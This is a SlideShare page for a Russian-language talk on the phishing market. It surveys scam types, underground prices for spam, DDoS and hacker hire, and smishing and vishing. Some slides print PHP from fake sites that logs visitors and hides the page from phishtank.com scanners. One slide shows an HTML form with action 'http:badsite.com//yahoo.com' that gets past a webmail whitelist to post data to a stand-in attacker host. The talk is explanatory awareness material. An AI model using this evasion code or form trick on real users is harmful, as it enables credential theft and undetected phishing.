SlideShare ist ein Scribd-Unternehmen logo
1 von 20
СОВРЕМЕННЫЙ РЫНОК
ФИШИНГА
MadCrush LLC
Малышев Дмитрий
ФИШИНГ
 Фи́шинг (англ. phishing, от fishing — рыбная ловля,
выуживание) — вид интернет-мошенничества, целью
которого является получение доступа к
конфиденциальным данным пользователей—логинам и
паролям.
НАЧАЛО: AOL
 Становление технологии фишинга пришлось на 1995 год и
жил на AOL (один из ранних крупнейших в США интернет-
провайдеров).
FAX-FISHING ATTACK
 Отправить email-письмо жертве от какой либо гос.
структуры
 Просить предоставить конфиденциальную информацию и
направить по факсу
 На стороне мошенника документ сканируется и
перенаправляется на его почту
 ???
 PROFIT!
KEYLOGGER
 Письма с простейшим программным обеспечением
считывающим нажатия на клавиатуре и передающим
информацию злоумышленнику
«ПИСЬМА СЧАСТЬЯ»
 ВЫ – ПОБЕДИТЕЛЬ АКЦИИ
 ВЫ – СТОМИЛЛИАРДТЫСЯЧНЫЙ ПОСЕТИТЕЛЬ
 ВЫ – ЛЕГКО ЗАРАБОТАЕТЕ ВСЕ ДЕНЬГИ ЗЕМЛИ
 Просто нажимай все ссылки!
«НИГЕРИЙСКИЕ ПИСЬМА»
 Чиновник/космонавт/победитель по жизни получил много
денег
 Коварное нигерийское правительство не даёт
возможности снять деньги
 Только ТЫ можешь помочь
 Просто перешли немного денег для
оформления документов и открытия счёта
СООБЩЕНИЕ ОТ АДВОКАТОВ И
ЮРИСТОВ (ИНОГДА И ОТ
РОСКОМНАДЗОРА)
 Вы (ВНЕЗАПНО!) получили наследство
 Нужно просто оформить бумаги
 Но для этого нужно прислать свои данные
 (Иногда и добавить файл на сервер)
АТАКА КЛОНОВ
 Копии легальных сайтов
выглядят как настоящие
 Пахнут как настоящие
 Стало быть настоящие
 (НЕТ)
ФИШИНГ И СПАМ – ЭТО НЕ
ДОРОГО
 Средняя цена – 1-2$ за 1000 писем
 Часто есть и другие услуги сервиса:
сбор клиентских баз, DDOS, взлом почты,
блокировка телефонных линий,
предоставление отчётов и даже обучение.
Я В БЛЭКХАТЫ БЫ ПОШЁЛ, ПУСТЬ
МЕНЯ НАУЧАТ!
 Учат всему:
 Web – пентест
 Работа с файерволами
 Вирусостроение
 Взлом почт и соцсетей
 Кардинг
 И проч. И проч.
ЦЕНЫ
 Рассылка:
1-2$ за 1000 сообщений
 DDOS: 60$ в день
 Найм хакера:
зависит от задачи,
обычно до 300 евро
 Обучение:
сильно разнятся
от 2500 до 60000 р
СРЕДНЯЯ ЦЕНА СПАМА
2014 год 2015 год 2016 год
0
200
400
600
800
1000
1200
1400
1600
Цена за 10000 писем
Цена за 10000 писем (руб.)
ДИВНЫЙ НОВЫЙ МИР
 SMS-фишинг (Smishing)
ДИВНЫЙ НОВЫЙ МИР
 Вишинг - голосовой фишинг
ЧТО МОЖНО НАЙТИ НА ФЕЙК-
САЙТЕ
 1) Запись данных посетителя
date_default_timezone_set(„Europe/Moscow“);
$u_ip = $_SERVER[„REMOTE_ADDR“];
$u_date = date(« l d F H:i:s»);
$u_agent = $_SERVER[„HTTP_USER_AGENT“];
$fop = fopen («logs/userip.txt», «a»);fputs($fop, «IP: $u_ip =
DATE: $u_date — BROWSER: $u_agentrn»)
ЧТО МОЖНО НАЙТИ НА ФЕЙК-
САЙТЕ
2) Проверка на проксирование
$response =
file_get_contents('http://www.shroomery.org/ythan/proxycheck.p
hp?ip='.$u_ip, 0, $context);
3) А если нас проверяют, что пользователь пришел с сайта с
проверкой фишинговых страниц, то можно проверить его
HTTP_REFERE и перекинуть на 404.
if(parse_url($_SERVER[„HTTP_REFERER“], PHP_URL_HOST) ==
„phishtank.com“){
ПРОБЛЕМЫ В ПОЧТОВЫХ
СИСТЕМАХ
t.message._formWhiteList = [
, «somedomain.com»],
t.message.formWarning = function(s) {
var i = s.getAttribute("action")
, n = i.split("/")[2];
return n && (n = n.split(".").slice(-2).join("."),
t.message._formWhiteList.indexOf(n) > 0) ? !0 : (e.ErrorLog.send({
event: "formWarning",
host: i
}),
window.confirm("Вы отправляете данные на сайт, не имеющий отношения к
Почтовому ресурсу. Продолжить?"))
}
ПРОБЛЕМЫ В ПОЧТОВЫХ
СИСТЕМАХ
Мы отправляем письмо содержащее следующий html код (обратите внимание на
action)
<form
action ='http:badsite.com//yahoo.com'' method=POST>
<input name='show_me_the_money'><br>
<input name='and_mention_on_habrahabr'><br> <input type='submit'>
</form>
В веб интерфейсе action будет выглядеть так:
http:badsite.com//yahoo.com
СПАСИБО ЗА
ВНИМАНИЕ

Weitere ähnliche Inhalte

Was ist angesagt?

калугин денис
калугин денискалугин денис
калугин денисtnik222
 
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”Timetogrowup
 
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...ArtemAgeev
 
Urok 5 7-0-99
Urok 5 7-0-99Urok 5 7-0-99
Urok 5 7-0-99Roouskkk
 
Выявление атак на пользователей систем ДБО и схем мошенничества
Выявление атак на пользователей систем ДБО и схем мошенничестваВыявление атак на пользователей систем ДБО и схем мошенничества
Выявление атак на пользователей систем ДБО и схем мошенничестваDenis Gorchakov
 
Internet Remedy
Internet RemedyInternet Remedy
Internet RemedyLegalCamp
 

Was ist angesagt? (9)

калугин денис
калугин денискалугин денис
калугин денис
 
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”
Никита Кныш - “Киберугрозы современного бизнеса, как вас можно ограбить”
 
Урок безопасности
Урок безопасностиУрок безопасности
Урок безопасности
 
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...
Беликов Максим Викторович. "Как за каменной стеной". Опыт защиты клиентских о...
 
Спам
СпамСпам
Спам
 
Urok 5 7-0-99
Urok 5 7-0-99Urok 5 7-0-99
Urok 5 7-0-99
 
Выявление атак на пользователей систем ДБО и схем мошенничества
Выявление атак на пользователей систем ДБО и схем мошенничестваВыявление атак на пользователей систем ДБО и схем мошенничества
Выявление атак на пользователей систем ДБО и схем мошенничества
 
Internet Remedy
Internet RemedyInternet Remedy
Internet Remedy
 
Internet Remedy
Internet RemedyInternet Remedy
Internet Remedy
 

Ähnlich wie Современный рынок фишинга

Informacionnaja bezopasnost
Informacionnaja bezopasnostInformacionnaja bezopasnost
Informacionnaja bezopasnostlida111
 
Целевой фишинг
Целевой фишингЦелевой фишинг
Целевой фишингCisco Russia
 
Борьба с фишингом. Пошаговая инструкция
Борьба с фишингом. Пошаговая инструкцияБорьба с фишингом. Пошаговая инструкция
Борьба с фишингом. Пошаговая инструкцияAleksey Lukatskiy
 
Cisco Ransomware Defense. Краткий обзор
Cisco Ransomware Defense. Краткий обзорCisco Ransomware Defense. Краткий обзор
Cisco Ransomware Defense. Краткий обзорCisco Russia
 
Бизнес-модель киберпреступности v2
Бизнес-модель киберпреступности v2Бизнес-модель киберпреступности v2
Бизнес-модель киберпреступности v2Aleksey Lukatskiy
 
3 ksb predictions_2017_rus
3 ksb predictions_2017_rus3 ksb predictions_2017_rus
3 ksb predictions_2017_rusAndrey Apuhtin
 
Skolkovo cybersecurity jan_2016_ev_exec
Skolkovo cybersecurity jan_2016_ev_execSkolkovo cybersecurity jan_2016_ev_exec
Skolkovo cybersecurity jan_2016_ev_execSergey Khodakov
 
Методы современных кибепреступников
Методы современных кибепреступниковМетоды современных кибепреступников
Методы современных кибепреступниковCisco Russia
 
вводная презентация
вводная презентациявводная презентация
вводная презентацияolga951
 
Современные вирусные угрозы
Современные вирусные угрозыСовременные вирусные угрозы
Современные вирусные угрозыDmitry Ledyaev
 
Мошенничество в системах ДБО
Мошенничество в системах ДБОМошенничество в системах ДБО
Мошенничество в системах ДБОExpolink
 
Presentation1
Presentation1Presentation1
Presentation1Sona8
 
Тенденции, влияющие на информационную безопасность
Тенденции, влияющие на информационную безопасностьТенденции, влияющие на информационную безопасность
Тенденции, влияющие на информационную безопасностьAleksey Lukatskiy
 

Ähnlich wie Современный рынок фишинга (20)

Informacionnaja bezopasnost
Informacionnaja bezopasnostInformacionnaja bezopasnost
Informacionnaja bezopasnost
 
Целевой фишинг
Целевой фишингЦелевой фишинг
Целевой фишинг
 
Борьба с фишингом. Пошаговая инструкция
Борьба с фишингом. Пошаговая инструкцияБорьба с фишингом. Пошаговая инструкция
Борьба с фишингом. Пошаговая инструкция
 
интернет 11 класс
интернет 11 классинтернет 11 класс
интернет 11 класс
 
киберпреступления
киберпреступлениякиберпреступления
киберпреступления
 
Spam
SpamSpam
Spam
 
Визитка Яроша
Визитка ЯрошаВизитка Яроша
Визитка Яроша
 
киберпреступления
киберпреступлениякиберпреступления
киберпреступления
 
киберпреступления
киберпреступлениякиберпреступления
киберпреступления
 
Cisco Ransomware Defense. Краткий обзор
Cisco Ransomware Defense. Краткий обзорCisco Ransomware Defense. Краткий обзор
Cisco Ransomware Defense. Краткий обзор
 
Бизнес-модель киберпреступности v2
Бизнес-модель киберпреступности v2Бизнес-модель киберпреступности v2
Бизнес-модель киберпреступности v2
 
3 ksb predictions_2017_rus
3 ksb predictions_2017_rus3 ksb predictions_2017_rus
3 ksb predictions_2017_rus
 
Skolkovo cybersecurity jan_2016_ev_exec
Skolkovo cybersecurity jan_2016_ev_execSkolkovo cybersecurity jan_2016_ev_exec
Skolkovo cybersecurity jan_2016_ev_exec
 
Методы современных кибепреступников
Методы современных кибепреступниковМетоды современных кибепреступников
Методы современных кибепреступников
 
вводная презентация
вводная презентациявводная презентация
вводная презентация
 
Современные вирусные угрозы
Современные вирусные угрозыСовременные вирусные угрозы
Современные вирусные угрозы
 
Мошенничество в системах ДБО
Мошенничество в системах ДБОМошенничество в системах ДБО
Мошенничество в системах ДБО
 
Presentation1
Presentation1Presentation1
Presentation1
 
спам
спамспам
спам
 
Тенденции, влияющие на информационную безопасность
Тенденции, влияющие на информационную безопасностьТенденции, влияющие на информационную безопасность
Тенденции, влияющие на информационную безопасность
 

Mehr von Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Mehr von Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Современный рынок фишинга

  • 2. ФИШИНГ  Фи́шинг (англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей—логинам и паролям.
  • 3. НАЧАЛО: AOL  Становление технологии фишинга пришлось на 1995 год и жил на AOL (один из ранних крупнейших в США интернет- провайдеров).
  • 4. FAX-FISHING ATTACK  Отправить email-письмо жертве от какой либо гос. структуры  Просить предоставить конфиденциальную информацию и направить по факсу  На стороне мошенника документ сканируется и перенаправляется на его почту  ???  PROFIT!
  • 5. KEYLOGGER  Письма с простейшим программным обеспечением считывающим нажатия на клавиатуре и передающим информацию злоумышленнику
  • 6. «ПИСЬМА СЧАСТЬЯ»  ВЫ – ПОБЕДИТЕЛЬ АКЦИИ  ВЫ – СТОМИЛЛИАРДТЫСЯЧНЫЙ ПОСЕТИТЕЛЬ  ВЫ – ЛЕГКО ЗАРАБОТАЕТЕ ВСЕ ДЕНЬГИ ЗЕМЛИ  Просто нажимай все ссылки!
  • 7. «НИГЕРИЙСКИЕ ПИСЬМА»  Чиновник/космонавт/победитель по жизни получил много денег  Коварное нигерийское правительство не даёт возможности снять деньги  Только ТЫ можешь помочь  Просто перешли немного денег для оформления документов и открытия счёта
  • 8. СООБЩЕНИЕ ОТ АДВОКАТОВ И ЮРИСТОВ (ИНОГДА И ОТ РОСКОМНАДЗОРА)  Вы (ВНЕЗАПНО!) получили наследство  Нужно просто оформить бумаги  Но для этого нужно прислать свои данные  (Иногда и добавить файл на сервер)
  • 9. АТАКА КЛОНОВ  Копии легальных сайтов выглядят как настоящие  Пахнут как настоящие  Стало быть настоящие  (НЕТ)
  • 10. ФИШИНГ И СПАМ – ЭТО НЕ ДОРОГО  Средняя цена – 1-2$ за 1000 писем  Часто есть и другие услуги сервиса: сбор клиентских баз, DDOS, взлом почты, блокировка телефонных линий, предоставление отчётов и даже обучение.
  • 11. Я В БЛЭКХАТЫ БЫ ПОШЁЛ, ПУСТЬ МЕНЯ НАУЧАТ!  Учат всему:  Web – пентест  Работа с файерволами  Вирусостроение  Взлом почт и соцсетей  Кардинг  И проч. И проч.
  • 12. ЦЕНЫ  Рассылка: 1-2$ за 1000 сообщений  DDOS: 60$ в день  Найм хакера: зависит от задачи, обычно до 300 евро  Обучение: сильно разнятся от 2500 до 60000 р
  • 13. СРЕДНЯЯ ЦЕНА СПАМА 2014 год 2015 год 2016 год 0 200 400 600 800 1000 1200 1400 1600 Цена за 10000 писем Цена за 10000 писем (руб.)
  • 14. ДИВНЫЙ НОВЫЙ МИР  SMS-фишинг (Smishing)
  • 15. ДИВНЫЙ НОВЫЙ МИР  Вишинг - голосовой фишинг
  • 16. ЧТО МОЖНО НАЙТИ НА ФЕЙК- САЙТЕ  1) Запись данных посетителя date_default_timezone_set(„Europe/Moscow“); $u_ip = $_SERVER[„REMOTE_ADDR“]; $u_date = date(« l d F H:i:s»); $u_agent = $_SERVER[„HTTP_USER_AGENT“]; $fop = fopen («logs/userip.txt», «a»);fputs($fop, «IP: $u_ip = DATE: $u_date — BROWSER: $u_agentrn»)
  • 17. ЧТО МОЖНО НАЙТИ НА ФЕЙК- САЙТЕ 2) Проверка на проксирование $response = file_get_contents('http://www.shroomery.org/ythan/proxycheck.p hp?ip='.$u_ip, 0, $context); 3) А если нас проверяют, что пользователь пришел с сайта с проверкой фишинговых страниц, то можно проверить его HTTP_REFERE и перекинуть на 404. if(parse_url($_SERVER[„HTTP_REFERER“], PHP_URL_HOST) == „phishtank.com“){
  • 18. ПРОБЛЕМЫ В ПОЧТОВЫХ СИСТЕМАХ t.message._formWhiteList = [ , «somedomain.com»], t.message.formWarning = function(s) { var i = s.getAttribute("action") , n = i.split("/")[2]; return n && (n = n.split(".").slice(-2).join("."), t.message._formWhiteList.indexOf(n) > 0) ? !0 : (e.ErrorLog.send({ event: "formWarning", host: i }), window.confirm("Вы отправляете данные на сайт, не имеющий отношения к Почтовому ресурсу. Продолжить?")) }
  • 19. ПРОБЛЕМЫ В ПОЧТОВЫХ СИСТЕМАХ Мы отправляем письмо содержащее следующий html код (обратите внимание на action) <form action ='http:badsite.com//yahoo.com'' method=POST> <input name='show_me_the_money'><br> <input name='and_mention_on_habrahabr'><br> <input type='submit'> </form> В веб интерфейсе action будет выглядеть так: http:badsite.com//yahoo.com